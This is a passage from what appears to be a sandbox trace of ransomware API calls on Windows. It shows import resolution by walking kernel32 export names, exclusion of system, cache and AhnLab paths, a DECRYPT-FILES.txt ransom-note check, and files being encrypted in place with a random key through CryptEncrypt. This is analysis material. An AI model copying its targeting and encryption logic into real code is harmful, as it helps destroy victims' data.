lpString2="DeleteVolumeMountPointW" | out: lpString1="DeleteVolumeMountPointW") returned="DeleteVolumeMountPointW" [0086.018] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTW") returned 23 [0086.018] lstrcpyA (in: lpString1=0x3f2d6e4, lpString2="DeviceIoControl" | out: lpString1="DeviceIoControl") returned="DeviceIoControl" [0086.018] lstrlenA (lpString="DEVICEIOCONTROL") returned 15 [0086.018] lstrcpyA (in: lpString1=0x3f2d6e4, lpString2="DisableThreadLibraryCalls" | out: lpString1="DisableThreadLibraryCalls") returned="DisableThreadLibraryCalls" [0086.018] lstrlenA (lpString="DISABLETHREADLIBRARYCALLS") returned 25 [0086.018] lstrcpyA (in: lpString1=0x3f2d6e4, lpString2="DisableThreadProfiling" | out: lpString1="DisableThreadProfiling") returned="DisableThreadProfiling" [0086.018] lstrlenA (lpString="DISABLETHREADPROFILING") returned 22 [0086.018] lstrcpyA (in: lpString1=0x3f2d6e4, lpString2="DisassociateCurrentThreadFromCallback" | out: lpString1="DisassociateCurrentThreadFromCallback") returned="DisassociateCurrentThreadFromCallback" [0086.018] lstrlenA (lpString="DISASSOCIATECURRENTTHREADFROMCALLBACK") returned 37 [0086.018] lstrcpyA (in: lpString1=0x3f2d6e4, lpString2="DisconnectNamedPipe" | out: lpString1="DisconnectNamedPipe") returned="DisconnectNamedPipe" [0086.018] lstrlenA (lpString="DISCONNECTNAMEDPIPE") returned 19 [0086.018] lstrcpyA (in: lpString1=0x3f2d6e4, lpString2="DnsHostnameToComputerNameA" | out: lpString1="DnsHostnameToComputerNameA") returned="DnsHostnameToComputerNameA" [0086.018] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEA") returned 26 [0086.018] lstrcpyA (in: lpString1=0x3f2d6e4, lpString2="DnsHostnameToComputerNameW" | out: lpString1="DnsHostnameToComputerNameW") returned="DnsHostnameToComputerNameW" [0086.018] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEW") returned 26 [0086.018] lstrcpyA (in: lpString1=0x3f2d6e4, lpString2="DosDateTimeToFileTime" | out: lpString1="DosDateTimeToFileTime") returned="DosDateTimeToFileTime" [0086.018] lstrlenA (lpString="DOSDATETIMETOFILETIME") returned 21 [0086.018] lstrcpyA (in: lpString1=0x3f2d6e4, lpString2="DosPathToSessionPathA" | out: lpString1="DosPathToSessionPathA") returned="DosPathToSessionPathA" [0086.018] lstrlenA (lpString="DOSPATHTOSESSIONPATHA") returned 21 [0086.018] lstrcpyA (in: lpString1=0x3f2d6e4, lpString2="DosPathToSessionPathW" | out: lpString1="DosPathToSessionPathW") returned="DosPathToSessionPathW" [0086.018] lstrlenA (lpString="DOSPATHTOSESSIONPATHW") returned 21 [0086.018] lstrcpyA (in: lpString1=0x3f2d6e4, lpString2="DuplicateConsoleHandle" | out: lpString1="DuplicateConsoleHandle") returned="DuplicateConsoleHandle" [0086.018] lstrlenA (lpString="DUPLICATECONSOLEHANDLE") returned 22 [0086.018] lstrcpyA (in: lpString1=0x3f2d6e4, lpString2="DuplicateHandle" | out: lpString1="DuplicateHandle") returned="DuplicateHandle" [0086.019] lstrlenA (lpString="DUPLICATEHANDLE") returned 15 [0086.019] lstrcpyA (in: lpString1=0x3f2d6e4, lpString2="EnableThreadProfiling" | out: lpString1="EnableThreadProfiling") returned="EnableThreadProfiling" [0086.019] lstrlenA (lpString="ENABLETHREADPROFILING") returned 21 [0086.019] lstrcpyA (in: lpString1=0x3f2d6e4, lpString2="EncodePointer" | out: lpString1="EncodePointer") returned="EncodePointer" [0086.019] lstrlenA (lpString="ENCODEPOINTER") returned 13 [0086.019] lstrcpyA (in: lpString1=0x3f2d6e4, lpString2="EncodeSystemPointer" | out: lpString1="EncodeSystemPointer") returned="EncodeSystemPointer" [0086.019] lstrlenA (lpString="ENCODESYSTEMPOINTER") returned 19 [0086.019] lstrcpyA (in: lpString1=0x3f2d6e4, lpString2="EndUpdateResourceA" | out: lpString1="EndUpdateResourceA") returned="EndUpdateResourceA" [0086.019] lstrlenA (lpString="ENDUPDATERESOURCEA") returned 18 [0086.019] lstrcpyA (in: lpString1=0x3f2d6e4, lpString2="EndUpdateResourceW" | out: lpString1="EndUpdateResourceW") returned="EndUpdateResourceW" [0086.019] lstrlenA (lpString="ENDUPDATERESOURCEW") returned 18 [0086.019] lstrcpyA (in: lpString1=0x3f2d6e4, lpString2="EnterCriticalSection" | out: lpString1="EnterCriticalSection") returned="EnterCriticalSection" [0086.019] lstrlenA (lpString="ENTERCRITICALSECTION") returned 20 [0086.019] lstrcpyA (in: lpString1=0x3f2d6e4, lpString2="EnumCalendarInfoA" | out: lpString1="EnumCalendarInfoA") returned="EnumCalendarInfoA" [0086.019] lstrlenA (lpString="ENUMCALENDARINFOA") returned 17 [0086.019] lstrcpyA (in: lpString1=0x3f2d6e4, lpString2="EnumCalendarInfoExA" | out: lpString1="EnumCalendarInfoExA") returned="EnumCalendarInfoExA" [0086.019] lstrlenA (lpString="ENUMCALENDARINFOEXA") returned 19 [0086.019] lstrcpyA (in: lpString1=0x3f2d6e4, lpString2="EnumCalendarInfoExEx" | out: lpString1="EnumCalendarInfoExEx") returned="EnumCalendarInfoExEx" [0086.019] lstrlenA (lpString="ENUMCALENDARINFOEXEX") returned 20 [0086.019] lstrcpyA (in: lpString1=0x3f2d6e4, lpString2="EnumCalendarInfoExW" | out: lpString1="EnumCalendarInfoExW") returned="EnumCalendarInfoExW" [0086.019] lstrlenA (lpString="ENUMCALENDARINFOEXW") returned 19 [0086.019] lstrcpyA (in: lpString1=0x3f2d6e4, lpString2="EnumCalendarInfoW" | out: lpString1="EnumCalendarInfoW") returned="EnumCalendarInfoW" [0086.019] lstrlenA (lpString="ENUMCALENDARINFOW") returned 17 [0086.019] lstrcpyA (in: lpString1=0x3f2d6e4, lpString2="EnumDateFormatsA" | out: lpString1="EnumDateFormatsA") returned="EnumDateFormatsA" [0086.019] lstrlenA (lpString="ENUMDATEFORMATSA") returned 16 [0086.019] lstrcpyA (in: lpString1=0x3f2d6e4, lpString2="EnumDateFormatsExA" | out: lpString1="EnumDateFormatsExA") returned="EnumDateFormatsExA" [0086.019] lstrlenA (lpString="ENUMDATEFORMATSEXA") returned 18 [0086.019] lstrcpyA (in: lpString1=0x3f2d6e4, lpString2="EnumDateFormatsExEx" | out: lpString1="EnumDateFormatsExEx") returned="EnumDateFormatsExEx" [0086.019] lstrlenA (lpString="ENUMDATEFORMATSEXEX") returned 19 [0086.019] lstrcpyA (in: lpString1=0x3f2d6e4, lpString2="EnumDateFormatsExW" | out: lpString1="EnumDateFormatsExW") returned="EnumDateFormatsExW" [0086.019] lstrlenA (lpString="ENUMDATEFORMATSEXW") returned 18 [0086.019] lstrcpyA (in: lpString1=0x3f2d6e4, lpString2="EnumDateFormatsW" | out: lpString1="EnumDateFormatsW") returned="EnumDateFormatsW" [0086.020] lstrcpyW (in: lpString1=0xfb0000, lpString2="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" | out: lpString1="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" [0086.020] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\ntuser.ini") returned 40 [0086.020] wsprintfW (in: param_1=0x3f2e39c, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\ntuser.ini.eh5o5Jp") returned 48 [0086.020] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\ntuser.ini" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\ntuser.ini"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\ntuser.ini.eh5o5Jp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\ntuser.ini.eh5o5jp"), dwFlags=0x0) returned 1 [0086.020] VirtualFree (lpAddress=0xfa0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0086.021] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0086.021] VirtualFree (lpAddress=0xf90000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0086.021] FindNextFileW (in: hFindFile=0x5f8c18, lpFindFileData=0x3f2f3cc | out: lpFindFileData=0x3f2f3cc*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cd94e0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x87f0ecb0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0x87f0ecb0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Pictures", cAlternateFileName="")) returned 1 [0086.021] lstrcmpW (lpString1="Pictures", lpString2=".") returned 1 [0086.021] lstrcmpW (lpString1="Pictures", lpString2="..") returned 1 [0086.021] lstrcatW (in: lpString1="Pictures", lpString2="\\" | out: lpString1="Pictures\\") returned="Pictures\\" [0086.021] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\", lpString2="Pictures\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\" [0086.021] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\", lpSrch="\\Program Files") returned 0x0 [0086.021] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\", lpSrch=":\\Windows") returned 0x0 [0086.021] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\", lpSrch="\\Games\\") returned 0x0 [0086.021] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\", lpSrch="\\Tor Browser\\") returned 0x0 [0086.021] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\", lpSrch="\\ProgramData\\") returned 0x0 [0086.022] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\", lpSrch="\\cache2\\entries\\") returned 0x0 [0086.022] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\", lpSrch="\\Low\\Content.IE5\\") returned 0x0 [0086.022] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\", lpSrch="\\User Data\\Default\\Cache\\") returned 0x0 [0086.022] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\", lpSrch="\\All Users") returned 0x0 [0086.022] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\", lpSrch="\\IETldCache\\") returned 0x0 [0086.022] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\", lpSrch="\\Local Settings\\") returned 0x0 [0086.022] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\", lpSrch="\\AppData\\Local") returned 0x0 [0086.022] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\", lpSrch="AhnLab") returned 0x0 [0086.022] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\", lpSrch="{0AFACED1-E828-11D1-9187-B532F1E9575D}") returned 0x0 [0086.022] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\") returned 39 [0086.022] lstrlenW (lpString="jkbimi8.tmp") returned 11 [0086.022] wsprintfW (in: param_1=0x3f2e930, param_2="%s\\%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\\\jkbimi8.tmp") returned 51 [0086.022] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\\\jkbimi8.tmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\jkbimi8.tmp"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000000, hTemplateFile=0x0) returned 0x430 [0086.022] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\") returned 39 [0086.022] lstrlenW (lpString="DECRYPT-FILES.txt") returned 17 [0086.022] wsprintfW (in: param_1=0x3f2e930, param_2="%s\\%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\\\DECRYPT-FILES.txt") returned 57 [0086.022] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\\\DECRYPT-FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0086.022] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\") returned 39 [0086.022] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\", lpString2="*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\*" [0086.022] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\*", lpFindFileData=0x3f2f150 | out: lpFindFileData=0x3f2f150*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cd94e0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xaf782820, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xaf782820, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5f8b98 [0086.022] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0086.022] FindNextFileW (in: hFindFile=0x5f8b98, lpFindFileData=0x3f2f150 | out: lpFindFileData=0x3f2f150*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cd94e0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xaf782820, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xaf782820, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0086.023] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0086.023] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0086.023] FindNextFileW (in: hFindFile=0x5f8b98, lpFindFileData=0x3f2f150 | out: lpFindFileData=0x3f2f150*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8a4d1d20, ftCreationTime.dwHighDateTime=0x1d4cc70, ftLastAccessTime.dwLowDateTime=0x53fa72b0, ftLastAccessTime.dwHighDateTime=0x1d4ca25, ftLastWriteTime.dwLowDateTime=0x53fa72b0, ftLastWriteTime.dwHighDateTime=0x1d4ca25, nFileSizeHigh=0x0, nFileSizeLow=0x10459, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="7zLH.gif", cAlternateFileName="")) returned 1 [0086.023] lstrcmpiW (lpString1="7zLH.gif", lpString2="DECRYPT-FILES.txt") returned -1 [0086.023] lstrcmpiW (lpString1="7zLH.gif", lpString2="autorun.inf") returned -1 [0086.023] lstrcmpiW (lpString1="7zLH.gif", lpString2="boot.ini") returned -1 [0086.023] lstrcmpiW (lpString1="7zLH.gif", lpString2="desktop.ini") returned -1 [0086.023] lstrcmpiW (lpString1="7zLH.gif", lpString2="ntuser.dat") returned -1 [0086.023] lstrcmpiW (lpString1="7zLH.gif", lpString2="iconcache.db") returned -1 [0086.023] lstrcmpiW (lpString1="7zLH.gif", lpString2="bootsect.bak") returned -1 [0086.023] lstrcmpiW (lpString1="7zLH.gif", lpString2="ntuser.dat.log") returned -1 [0086.023] lstrcmpiW (lpString1="7zLH.gif", lpString2="thumbs.db") returned -1 [0086.023] lstrcmpiW (lpString1="7zLH.gif", lpString2="Bootfont.bin") returned -1 [0086.023] lstrlenW (lpString="7zLH.gif") returned 8 [0086.023] lstrcmpiW (lpString1="gif", lpString2="lnk") returned -1 [0086.023] lstrcmpiW (lpString1="gif", lpString2="exe") returned 1 [0086.023] lstrcmpiW (lpString1="gif", lpString2="sys") returned -1 [0086.023] lstrcmpiW (lpString1="gif", lpString2="dll") returned 1 [0086.023] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\") returned 39 [0086.023] lstrlenW (lpString="7zLH.gif") returned 8 [0086.023] lstrcpyW (in: lpString1=0x3f2e920, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\" [0086.023] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\", lpString2="7zLH.gif" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\7zLH.gif") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\7zLH.gif" [0086.023] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0xf90000 [0086.023] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\7zLH.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\7zlh.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x410 [0086.024] GetFileSizeEx (in: hFile=0x410, lpFileSize=0x3f2e0e8 | out: lpFileSize=0x3f2e0e8*=66649) returned 1 [0086.024] CreateFileMappingW (hFile=0x410, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x414 [0086.024] MapViewOfFile (hFileMappingObject=0x414, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0xfa0000 [0086.024] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x20, pbBuffer=0xf90000 | out: pbBuffer=0xf90000) returned 1 [0086.024] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x8, pbBuffer=0xf90020 | out: pbBuffer=0xf90020) returned 1 [0086.024] VirtualAlloc (lpAddress=0x0, dwSize=0x108, flAllocationType=0x3000, flProtect=0x4) returned 0xfc0000 [0086.024] CryptEncrypt (in: hKey=0x5f8a98, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xfc0000*, pdwDataLen=0x3f2e050*=0x28, dwBufLen=0x100 | out: pbData=0xfc0000*, pdwDataLen=0x3f2e050*=0x100) returned 1 [0086.024] VirtualAlloc (lpAddress=0x0, dwSize=0x1001, flAllocationType=0x3000, flProtect=0x4) returned 0x10d0000 [0086.026] VirtualFree (lpAddress=0x10d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0086.026] UnmapViewOfFile (lpBaseAddress=0xfa0000) returned 1 [0086.027] CloseHandle (hObject=0x414) returned 1 [0086.027] SetFilePointerEx (in: hFile=0x410, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0086.027] WriteFile (in: hFile=0x410, lpBuffer=0xfc0000*, nNumberOfBytesToWrite=0x108, lpNumberOfBytesWritten=0x3f2e070, lpOverlapped=0x0 | out: lpBuffer=0xfc0000*, lpNumberOfBytesWritten=0x3f2e070*=0x108, lpOverlapped=0x0) returned 1 [0086.028] CloseHandle (hObject=0x0) returned 0 [0086.028] CloseHandle (hObject=0x410) returned 1 [0086.028] VirtualFree (lpAddress=0xfc0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0086.028] VirtualFree (lpAddress=0xf90000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0086.028] GetTickCount () returned 0x114df58 [0086.028] VirtualAlloc (lpAddress=0x0, dwSize=0x18, flAllocationType=0x3000, flProtect=0x4) returned 0xf90000 [0086.028] lstrlenW (lpString="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned 62 [0086.029] VirtualAlloc (lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x4) returned 0xfa0000 [0086.029] VirtualAlloc (lpAddress=0x0, dwSize=0x7e, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0086.029] lstrlenA (lpString="kernel32.dll") returned 12 [0086.029] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x76c20000 [0086.029] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AcquireSRWLockExclusive" | out: lpString1="AcquireSRWLockExclusive") returned="AcquireSRWLockExclusive" [0086.029] lstrlenA (lpString="ACQUIRESRWLOCKEXCLUSIVE") returned 23 [0086.029] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AcquireSRWLockShared" | out: lpString1="AcquireSRWLockShared") returned="AcquireSRWLockShared" [0086.029] lstrlenA (lpString="ACQUIRESRWLOCKSHARED") returned 20 [0086.029] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ActivateActCtx" | out: lpString1="ActivateActCtx") returned="ActivateActCtx" [0086.029] lstrlenA (lpString="ACTIVATEACTCTX") returned 14 [0086.029] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddAtomA" | out: lpString1="AddAtomA") returned="AddAtomA" [0086.029] lstrlenA (lpString="ADDATOMA") returned 8 [0086.029] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddAtomW" | out: lpString1="AddAtomW") returned="AddAtomW" [0086.029] lstrlenA (lpString="ADDATOMW") returned 8 [0086.029] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddConsoleAliasA" | out: lpString1="AddConsoleAliasA") returned="AddConsoleAliasA" [0086.029] lstrlenA (lpString="ADDCONSOLEALIASA") returned 16 [0086.029] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddConsoleAliasW" | out: lpString1="AddConsoleAliasW") returned="AddConsoleAliasW" [0086.030] lstrlenA (lpString="ADDCONSOLEALIASW") returned 16 [0086.030] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddIntegrityLabelToBoundaryDescriptor" | out: lpString1="AddIntegrityLabelToBoundaryDescriptor") returned="AddIntegrityLabelToBoundaryDescriptor" [0086.030] lstrlenA (lpString="ADDINTEGRITYLABELTOBOUNDARYDESCRIPTOR") returned 37 [0086.030] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddLocalAlternateComputerNameA" | out: lpString1="AddLocalAlternateComputerNameA") returned="AddLocalAlternateComputerNameA" [0086.030] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEA") returned 30 [0086.030] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddLocalAlternateComputerNameW" | out: lpString1="AddLocalAlternateComputerNameW") returned="AddLocalAlternateComputerNameW" [0086.030] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEW") returned 30 [0086.030] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddRefActCtx" | out: lpString1="AddRefActCtx") returned="AddRefActCtx" [0086.030] lstrlenA (lpString="ADDREFACTCTX") returned 12 [0086.030] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddSIDToBoundaryDescriptor" | out: lpString1="AddSIDToBoundaryDescriptor") returned="AddSIDToBoundaryDescriptor" [0086.030] lstrlenA (lpString="ADDSIDTOBOUNDARYDESCRIPTOR") returned 26 [0086.030] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddSecureMemoryCacheCallback" | out: lpString1="AddSecureMemoryCacheCallback") returned="AddSecureMemoryCacheCallback" [0086.030] lstrlenA (lpString="ADDSECUREMEMORYCACHECALLBACK") returned 28 [0086.030] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddVectoredContinueHandler" | out: lpString1="AddVectoredContinueHandler") returned="AddVectoredContinueHandler" [0086.030] lstrlenA (lpString="ADDVECTOREDCONTINUEHANDLER") returned 26 [0086.030] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddVectoredExceptionHandler" | out: lpString1="AddVectoredExceptionHandler") returned="AddVectoredExceptionHandler" [0086.030] lstrlenA (lpString="ADDVECTOREDEXCEPTIONHANDLER") returned 27 [0086.030] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AdjustCalendarDate" | out: lpString1="AdjustCalendarDate") returned="AdjustCalendarDate" [0086.030] lstrlenA (lpString="ADJUSTCALENDARDATE") returned 18 [0086.030] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AllocConsole" | out: lpString1="AllocConsole") returned="AllocConsole" [0086.030] lstrlenA (lpString="ALLOCCONSOLE") returned 12 [0086.030] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AllocateUserPhysicalPages" | out: lpString1="AllocateUserPhysicalPages") returned="AllocateUserPhysicalPages" [0086.030] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGES") returned 25 [0086.030] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AllocateUserPhysicalPagesNuma" | out: lpString1="AllocateUserPhysicalPagesNuma") returned="AllocateUserPhysicalPagesNuma" [0086.030] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGESNUMA") returned 29 [0086.030] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ApplicationRecoveryFinished" | out: lpString1="ApplicationRecoveryFinished") returned="ApplicationRecoveryFinished" [0086.030] lstrlenA (lpString="APPLICATIONRECOVERYFINISHED") returned 27 [0086.030] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ApplicationRecoveryInProgress" | out: lpString1="ApplicationRecoveryInProgress") returned="ApplicationRecoveryInProgress" [0086.031] lstrlenA (lpString="APPLICATIONRECOVERYINPROGRESS") returned 29 [0086.031] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AreFileApisANSI" | out: lpString1="AreFileApisANSI") returned="AreFileApisANSI" [0086.031] lstrlenA (lpString="AREFILEAPISANSI") returned 15 [0086.031] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AssignProcessToJobObject" | out: lpString1="AssignProcessToJobObject") returned="AssignProcessToJobObject" [0086.031] lstrlenA (lpString="ASSIGNPROCESSTOJOBOBJECT") returned 24 [0086.031] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AttachConsole" | out: lpString1="AttachConsole") returned="AttachConsole" [0086.031] lstrlenA (lpString="ATTACHCONSOLE") returned 13 [0086.031] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BackupRead" | out: lpString1="BackupRead") returned="BackupRead" [0086.031] lstrlenA (lpString="BACKUPREAD") returned 10 [0086.031] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BackupSeek" | out: lpString1="BackupSeek") returned="BackupSeek" [0086.031] lstrlenA (lpString="BACKUPSEEK") returned 10 [0086.031] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BackupWrite" | out: lpString1="BackupWrite") returned="BackupWrite" [0086.031] lstrlenA (lpString="BACKUPWRITE") returned 11 [0086.031] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseCheckAppcompatCache" | out: lpString1="BaseCheckAppcompatCache") returned="BaseCheckAppcompatCache" [0086.031] lstrlenA (lpString="BASECHECKAPPCOMPATCACHE") returned 23 [0086.031] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseCheckAppcompatCacheEx" | out: lpString1="BaseCheckAppcompatCacheEx") returned="BaseCheckAppcompatCacheEx" [0086.031] lstrlenA (lpString="BASECHECKAPPCOMPATCACHEEX") returned 25 [0086.031] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseCheckRunApp" | out: lpString1="BaseCheckRunApp") returned="BaseCheckRunApp" [0086.031] lstrlenA (lpString="BASECHECKRUNAPP") returned 15 [0086.031] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseCleanupAppcompatCacheSupport" | out: lpString1="BaseCleanupAppcompatCacheSupport") returned="BaseCleanupAppcompatCacheSupport" [0086.031] lstrlenA (lpString="BASECLEANUPAPPCOMPATCACHESUPPORT") returned 32 [0086.031] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseDllReadWriteIniFile" | out: lpString1="BaseDllReadWriteIniFile") returned="BaseDllReadWriteIniFile" [0086.031] lstrlenA (lpString="BASEDLLREADWRITEINIFILE") returned 23 [0086.031] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseDumpAppcompatCache" | out: lpString1="BaseDumpAppcompatCache") returned="BaseDumpAppcompatCache" [0086.031] lstrlenA (lpString="BASEDUMPAPPCOMPATCACHE") returned 22 [0086.031] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseFlushAppcompatCache" | out: lpString1="BaseFlushAppcompatCache") returned="BaseFlushAppcompatCache" [0086.031] lstrlenA (lpString="BASEFLUSHAPPCOMPATCACHE") returned 23 [0086.031] lstrcpyA (in: lpString1=0x3f2d468, 